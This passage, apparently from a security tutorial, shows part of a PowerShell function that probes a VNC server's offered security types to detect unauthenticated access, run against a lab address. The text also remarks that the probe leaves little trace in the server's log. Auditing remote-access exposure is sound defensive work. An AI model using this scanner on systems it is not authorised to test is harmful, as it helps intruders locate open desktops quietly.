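            # 3.7+: one byte count followed by one byte per offered security type
            $Count = $Stream.ReadByte()
            if ($Count -le 0) { return 'HANDSHAKE FAILED' }   # 0 = server follows with a failure reason
            $Types = 1..$Count | ForEach-Object { $Stream.ReadByte() }
        } else {
            # 3.3: server dictates a single 32-bit big-endian security type
            $T = New-Object byte[] 4
            [void]$Stream.Read($T, 0, 4)
            $Types = @(($T[0] -shl 24) -bor ($T[1] -shl 16) -bor ($T[2] -shl 8) -bor $T[3])
        }

        # 1 = None (no authentication), 2 = VNC Authentication (DES challenge), 16+ = vendor/TLS types
        if ($Types -contains 1) { return 'AUTH NOT REQUIRED' }
        return "AUTH REQUIRED (types: $($Types -join ','))"
    }
    catch { return "ERROR: $($_.Exception.Message)" }
    finally { $Client.Close() }
}

# Constructed target taken from the example output above
Test-VncNoAuth -Target '10.10.10.27'
```

Because the probe disconnects right after reading the security types, it leaves nothing more than a short-lived connection in the VNC server's log; a server that offers type 1 should be treated as an unauthenticated interactive session for whoever can reach port 5900.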